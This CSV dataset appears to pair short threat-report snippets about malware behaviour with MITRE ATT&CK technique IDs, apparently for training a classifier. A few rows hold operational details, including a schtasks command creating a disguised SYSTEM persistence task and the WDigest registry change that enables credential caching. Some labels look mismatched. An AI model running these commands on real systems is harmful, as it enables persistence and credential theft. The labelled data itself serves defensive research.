text,label
can save encryption parameters and system information to the Registry.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020),T1112
can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.,T1068
"extract sensitive information,",T1005
uses credential dumpers such as  and  to extract cached credentials from Windows systems.,T1003.001
executes batch scripts on the victims machine and can launch a reverse shell for command execution.(Citation: FireEye FELIXROOT July 2018),T1059.003
"This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence",T1140
During  the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.,T1566.001
can use a renamed image of `cmd.exe` for execution.,T1059.003
obfuscated JavaScript code,T1027
has the capability to log keystrokes from the victims machine both offline and online.(Citation: jRAT Symantec Aug 2018),T1056.001
schtasks /create /F /tn “\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager” /tr “C:\Windows\SoftwareDistribution\EventCacheManager.exe” /sc ONSTART /ru system /,T1053.005
Connects to a given host via a socket and waits for the server to send data.,T1095
attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.,T1204.002
has a command to write random data across a file and delete it.,T1070.004
can collect sensitive NTLM material from a compromised host.,T1005
an encrypted shellcode payload.,T1027
is obfuscated using the obfuscation tool called ConfuserEx.,T1027
can download additional files to a targeted system.,T1105
can use GetProcAddress to help delete malicious strings from memory.,T1106
some defense evasion batch scripts.,T1059.003
can collect the computer name system architecture default language and processor frequency of a compromised host.,T1082
can proxy TCP socket connections to obfuscate command and control infrastructure.(Citation: Operation Quantum Entanglement),T1090
encrypts C2 traffic using AES with a static key.,T1573.001
"Obfuscation While the downloader module is not packed, the backdoor is packed with a modified version of UPX",T1027
ipconfig /all,T1016
can collect a list of running processes by calling CreateToolhelp32Snapshot.(Citation: Unit42 Azorult Nov 2018),T1057
uses cmd.exe to execute commands on the system.(Citation: ESET Zebrocy May 2019) ,T1059.003
HTTP communication between the Beacon and the Cobalt Strike server,T1071.001
can identify files with .doc .docx .ppt .pptx .xls .xlsx and .pdf extensions and specific timestamps for collection.,T1083
the actors manually disabled Windows Defender via the Graphical User Interface (GUI),T1562.001
The POST event included a MIME part indicating file upload,T1071.001
The team cracked a user’s workstation account password after learning the user’s patterns from plaintext credentials.,T1110
has the ability to download files.,T1105
achieves persistence by adding a shortcut of itself to the startup path in the Registry.,T1547.001
The author of  submitted samples to VirusTotal for testing showing that the author modified the code to try to hide the DDE object in a different part of the document.,T1027
has convinced victims to open malicious attachments to execute malware.,T1204.002
the computer name is sent to the C2,T1041
svcService Type: user mode serviceService Start Type: auto startService Account: LocalSystem,T1543.003
can identify system information including battery status.,T1082
can stage data prior to exfiltration in %APPDATA%\Microsoft\UserSetting and %APPDATA%\Microsoft\UserSetting\MediaCache.(Citation: Eset Ramsay May 2020),T1074.001
features multiple flags that could be set as command line arguments,T1059.003
creates another group policy,T1484.001
can capture screenshots and store them locally.,T1113
uses PowerShell to add a Registry Run key in order to establish persistence.,T1547.001
used HTTP and HTTPS to send data back to its C2 server.(Citation: Malwarebytes Higaisa 2020),T1071.001
has used the  RAT which communicates over HTTP with a payload encrypted with RC4.,T1573.001
has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017),T1113
has created a scheduled task to execute additional malicious software as well as maintain persistence.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019),T1053.005
Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace,T1047
has a function to write itself to Registry values. ,T1112
requests using RC4 encryption,T1573.001
"The ""Blackwater.bas"" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.",T1027
uses  to perform remote service manipulation to execute a copy of itself as part of lateral movement.,T1569.002
The C# implementation of the  command execution module can use cmd.,T1059.003
The threat used valid accounts against remote services:,T1078
can look for files carrying specific extensions such as: .rtf .doc .docx .xls .xlsx .ppt .pptx .pps .ppsx .txt .gpg .pkr .kdbx .key and .jpb.,T1083
"were observed using Microsoft signed binaries, such as Rundll32, as a proxy to execute malicious payloads.",T1218.011
has the ability to send system volume information to C2.,T1082
This file was opened during their RDP session and contained the PowerShell commands used to launch a new beacon:,T1021.001
uses RC4 to encrypt C2 responses.,T1573.001
"modified the WDigest registry key value
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
to enable credential caching.",T1112
can create a scheduled task to establish persistence.,T1053.005
"a second, encrypted component, which carries the payload.",T1027
injected code in a process,T1055
Several  malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by  also gathers process times.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: TrendMicro macOS Dacls May 2020),T1057
"starts by enumerating *.blf files in the default user’s profile
directory",T1083
compromised user credentials and used valid accounts for operations.,T1078
collects files with the following extensions: .ppt .pptx .pdf .doc .docx .xls .xlsx .docm .rtf .inp .xlsm .csv .odt .pps .vcf and sends them back to the C2 server.,T1005
can create a reverse shell on the infected endpoint using cmd.exe.  has been executed via malicious macros.,T1059.003
"Before exfiltration, the attackers may put collected data in 7Zip archives.",T1074.001
"Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence:  Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK  This chain of functions eventually loads a resource named ‘GSrdofjksrgj’, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] {     19,     129,     43,     37,     56,     65,     255,     75,     111,     19,     211,     120,     0,     49,     126,     248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool",T1569.002
has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.,T1518.001
actors spawned shells on remote systems on a victim network to execute commands.,T1059.003
checks its parent process for indications that it is running in a sandbox setup.(Citation: FinFisher Citation),T1057
supports HTTP-based C2 profiles.,T1071.001
can run as a service using svchost.exe.,T1569.002
has used credential dumpers or stealers to obtain legitimate credentials which they used to gain access to victim accounts.,T1078
malware aims to deactivate User Account Control (UAC) on the target system,T1548.002
HTTP POST request used for FlowCloud C&C communication,T1071.001
has commands to get information about the victim's name build version serial number and memory usage.,T1082
Other functionalities provided by this section of the PowerShell Script are as follows:  Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username    All of this data is concatenated and formatted as shown in Figure 13:    Figure 13: Concatenated and formatted data retrieved by PowerShell script  Register the victim’s machine to the C2 server by sending the REGISTER command to the server,T1082
Rundll32.exe is used as a way of executing  at the command-line.,T1218.011
malware gathers the Address Resolution Protocol (ARP) table from the victim.,T1016
and inject it into winver.exe for the next-stage payload,T1055
can collect information on the Windows directory and searches for compressed RAR files on the host.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018),T1083
has the ability to execute arbitrary commands via `cmd.exe`.(Citation: SecureWorks August 2019),T1059.003
captures keystrokes and sends them back to the C2 server.,T1056.001
"its C2 server consists of
JSON data exchanged via HTTP POST requests.",T1071.001
can disable SELinux Role-Based Access Control and deactivate PAM modules.,T1562.001
UAC Bypass via the AppInfo RPC service,T1548.002
has embedded binaries within RC4 encrypted .png files.,T1027
can perform Registry operations.,T1112
"they connected to a domain controller and dropped three scripts; one to copy the ransomware executable to all hosts, one to reset every users password in the organization, and a final one to execute the staged ransomware payload using PsExec",T1570
has stored collected data under `%<malware_execution_folder>%\\CrashLog.txt`.,T1074.001
established persistence via a run key.,T1547.001
The C2 is constructed with the victim's enumerated data,T1005
can execute through the WinExec API.,T1106
can use a batch script to delete itself.,T1059.003
the threat actors used PowerShell to download multiple malware and archives from the server,T1105
Looking at the decrypted data,T1140
has deployed payloads that use Windows API calls on a compromised host.,T1106
After downloading its main config file  downloads multiple payloads from C2 servers.,T1105
has the capability to download files to execute on the victims machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020) ,T1105
containing obfuscated PowerShell scripts,T1027
has a module to inject a PE binary into a remote process.,T1055
"Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters",T1518.001
can use stolen domain admin accounts to move laterally within a victim domain.,T1078
achieves persistence by creating a shortcut in the Startup folder.,T1547.001
has used services.exe to execute scripts and executables during lateral movement within a victim network.(Citation: DFIR Ryuk's Return October 2020),T1569.002
The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the “attachedTemplate” technique to load a template from a remote server,T1566.001
to escalate privileges using valid accounts,T1078
can obtain the victim user name.,T1033
has delivered initial payloads hidden using archives and encoding measures.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020),T1027
can use CVE-2019-0859 to escalate privileges on a compromised host.,T1068
has used built-in API functions.,T1106
has been executed through malicious e-mail attachments.,T1204.002
can obtain the id of a logged in user.,T1033
disable system defenses,T1562.001
can collect the IP address of the victims and other computers on the network using the commands: ipconfig -all nbtstat -n and nbtstat -s.(Citation: ESET Carbon Mar 2017),T1016
used svchost.exe and  to execute a system service installed to launch a  BEACON loader.(Citation: FireEye APT41 March 2020),T1569.002
uses services.exe to register a new autostart service named Audit Service using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21),T1569.002
has enumerated processes by ID name or privileges. ,T1057
 Malicious actors typically gain entry to organizations’ Microsoft 365 environments by abusing either stolen account credentials,T1078
has discovered the username of the user running the backdoor.,T1033
"backdoor source code is embedded as an encrypted
string.",T1027
drops suspicious files on the attacked servers,T1105
enumerating current directory ,T1083
"Upon clicking the Open button, it drops the HTA file",T1204.002
can run  to harvest credentials.(Citation: Threatpost Lizar May 2021) ,T1003.001
has the ability to search for a given filename on a victim.,T1083
has been packed with NSIS. ,T1027
can use various API calls.,T1106
achieves persistence by setting a Registry Run key with the path depending on whether the victim account has user or administrator access.,T1547.001
"The encryption algorithm
is HC-128,",T1027
has used encoded PowerShell commands.,T1027
The emulated C2 Server is now running an HTTPS server,T1071.001
stealing sensitive data from the victim’s networks.,T1005
Base64 encoded string with several string replacements.,T1027
wmiexec module can be used to execute commands through WMI.,T1047
"cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC).",T1210
can check for specific processes associated with virtual environments.,T1057
has exfiltrated data over the C2 channel.,T1041
collected the username from a compromised host.(Citation: FireEye SUNBURST Backdoor December 2020),T1033
has downloaded additional modules and malware to victims machines.,T1105
decrypted its  payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.(Citation: Symantec RAINDROP January 2021),T1140
The original variant of  encrypts C2 traffic using a custom encryption cipher that uses an XOR key of YHCRA and bit rotation between each XOR operation. Some variants of  use RC4 to encrypt C2 traffic.,T1573.001
downloading and executing two other PowerShell scripts from a different attacker-controlled server,T1105
has the capability to delete files off the victims machine.,T1070.004
has a command to download a file from the C2 server to the victim mobile device's SD card.,T1105
can collect information about a compromised computer including: Hardware UUID Mac serial number macOS version and disk sizes.,T1082
has staged collected data in a central upload directory prior to exfiltration.,T1074.001
can use a variety of APIs for execution.,T1106
has the ability to remove files and folders related to previous infections.,T1070.004
"Windows Defender, other anti-malware solutions and monitoring tools are disabled utilizing a process explorer tool,",T1562.001
has exploited web server vulnerabilities for initial access.,T1190
the attacker’s BAT file to run,T1059.003
encrypts its configuration file using a simple algorithm.,T1027
s plugin deletes the collected files and log files after exfiltration.,T1070.004
The decryption function is custom,T1140
During  the threat actors used Base64-encoded strings.,T1027
has relied on users enabling malicious macros within Microsoft Excel and Word attachments.(Citation: ZScaler Squirrelwaffle Sep 2021),T1204.002
A  tool can create a new service naming it after the config information to gain persistence.,T1543.003
can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points or provide access to a host without direct internet access.(Citation: cobaltstrike manual),T1090
used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019),T1021.001
which downloaded obfuscated PowerShell and executed it in memory:,T1105
Base64 encoded RAT execution command,T1027
This shellcode is decrypted in memory through EQENDT32.EXE,T1027
the malware decrypts the saved passwords,T1140
has the ability to use port forwarding to establish a proxy between a target host and C2.,T1090
the decryption key for the ZIP folder and access the tool,T1140
The shellcode is then executed in a new thread.,T1055
the adversary attempting to exfiltrate sensitive information over SMB (TCP/445) directly from a compromised domain controller.,T1041
has called the Windows API to retrieve the hard disk handle and shut down the machine.,T1106
can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points or provide access to a host without direct internet access.,T1090
has used a custom TCP protocol with four-byte XOR for command and control (C2).,T1573.001
HTTP POST request (type 27 / data exfiltration).,T1041
has used HTTP GET and POST requests for C2 communications.(Citation: Securelist Octopus Oct 2018),T1071.001
collects information about the Internet adapter configuration.(Citation: Symantec Dragonfly),T1016
as a hard-coded XOR key,T1027
has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020),T1059.003
USBS Deletes the file created by the USB command to reverse the effect,T1070.004
has batch files that modify the system service COMSysApp to load a malicious DLL.,T1543.003
used the service control manager on a remote system to disable services associated with security monitoring products.,T1562.001
has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.,T1078
modifies the Windows Registry to allow remote desktop connections,T1112
malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.,T1055
can use TCP in communications with C2.,T1095
has spawned a new cmd.exe process to execute commands. ,T1059.003
uses a tool called CLEANTOAD that has the capability to modify Registry keys.,T1112
has searched for files on the infected host.,T1083
can use known credentials to run commands and spawn processes as a local user account.(Citation: cobaltstrike manual),T1078
the threat actor was seen establishing RDP connections,T1021.001
bypassed User Access Control (UAC).,T1548.002
"Once the execution completes, the file is deleted to leave no evidence on the machine.",T1070.004
has decoded and decrypted the configuration file when executed.(Citation: MSTIC NOBELIUM Mar 2021),T1140
has targeted victims with e-mails containing malicious attachments.,T1566.001
s plugins were obfuscated with Eazfuscater.NET 3.3.,T1027
has the ability to index files from drives user profiles and removable drives.,T1083
The process list checked is as follows,T1057
can send data gathered from a target through the command and control channel.(Citation: Github PowerShell Empire),T1041
collects information from the victim including installed drivers programs previously executed by users programs and services configured to automatically run at startup files and folders present in any user's home folder files and folders present in any user's My Documents programs installed to the Program Files folder and recently accessed files folders and programs.,T1083
has been distributed in e-mails with malicious Excel or Word documents.,T1566.001
"In some cases, batch (.bat) scripts were created",T1059.003
is capable of enumerating the running processes on the system using pslist.(Citation: Unit 42 Tropic Trooper Nov 2016),T1057
recursively searches for all .doc files on the system and collects a directory listing of the Desktop %TEMP% and %WINDOWS%\Temp directories.(Citation: Kaspersky Turla),T1083
Setup the CDN service to create a new CDN endpoint and redirect traffic to your domain.,T1090
Process Injection method,T1055
gathers the computer name the serial number of the main disk volume CPU information Microsoft Windows version and runs the command systeminfo.,T1082
collects a list of installed antivirus software from the victims system.(Citation: Fortinet Metamorfo Feb 2020) ,T1518.001
performed via the following command-line syntax,T1059.003
can install itself as a service on compromised machines.,T1569.002
FIN6 also moved laterally to servers in the environment using RDP and configured them as malware “distribution” servers.,T1021.001
mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.(Citation: FireEye Know Your Enemy FIN8 Aug 2016),T1036.005
has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.,T1574.002
has enumerated files and folders on all mounted drives.,T1083
a decompression utility to extract the ransomware,T1140
has used encryption (including salted 3DES via 's Out-EncryptedScript.ps1) random variable names and base64 encoding to obfuscate PowerShell commands and payloads.,T1027
can persist by setting Registry key values HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic.,T1547.001
captures screenshots in .jpg format and then exfiltrates them.,T1113
can launch a remote shell to execute commands on the victims machine.,T1059.003
new encrypted shellcode,T1027
has the ability to set persistence using the Task Scheduler.,T1053.005
has the ability to decrypt embedded .NET and PE payloads.,T1140
"Displayed below are these new, xml formatted plugin names “weap_hwi”, “ps”, and “vsnet” in a BlackEnergy configuration file download from a c2 server",T1105
has written process names to the Registry disabled IE browser features deleted Registry keys and changed the ExtendedUIHoverTime key.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018),T1112
It contains Base64-encoded data,T1027
can use wmic process call create in a scheduled task to launch plugins and for execution.,T1047
creates a group policy,T1484.001
the new drive contained a LNK file 6570872.lnk and hidden folder “me”.,T1564.001
Threat actors used the lolbin wmic.exe in order to execute PowerShell Cobalt Strike beacons on multiple workstations and servers,T1047
"""cmd""  /c",T1059.003
an information stealer used to harvest internal information.,T1005
BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet but are interconnected locally.,T1090
has the ability to identify the username on the compromised host.,T1033
"Next, they proceeded to transfer a beacon executable over SMB to the remote host’s ProgramData directory.",T1570
collects the system information including hostname and OS version and sends it to the C2 server.,T1082
reading files,T1083
relays traffic between a C2 server and a victim.,T1090
has been seen using the PowerShell module InvokeGPUpdate to update the group policy.,T1484.001
has used HTTP for C2 communications.,T1071.001
can take screenshots of the victims machine.,T1113
collects registered owner details by using the commands systeminfo and net config workstation.,T1033
disguised its malicious binaries with several layers of obfuscation including encrypting the files.,T1027
can check for blocklisted usernames on infected endpoints.,T1033
by redirecting calls to the Windows Sleep API to its own function,T1106
The  C2 channel uses HTTP POST requests.,T1071.001
can collect files from a compromised host.,T1005
This module allows the injection of a PE file into a remote or local process’s memory without writing it to disk,T1055
As the hosts receive the task through GPO,T1484.001
script to restore deobfuscate control flow.,T1140
a batch file,T1059.003
has the ability to identify the hostname computer name Windows version processor speed machine GUID and disk information on a compromised host.,T1082
exploiting vulnerabilities in the remote desktop protocol (RDP).,T1210
has used malware to collect information on network interfaces including the MAC address.,T1016
has a variant with a packed payload.(Citation: Cybereason Bazar July 2020),T1027
can execute remote commands in the Windows command shell using the WinExec() API.,T1106
used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victims machine.,T1016
brute-force attacks on systems,T1110
can delete files from a compromised host after they are exfiltrated.,T1070.004
A module in  collects information from the victim about installed anti-virus software.,T1518.001
can download files to a compromised machine.,T1105
func_GetHostSerialNumber(),T1082
has used remote code execution to download subsequent payloads.(Citation: FireEye Fin8 May 2016),T1105
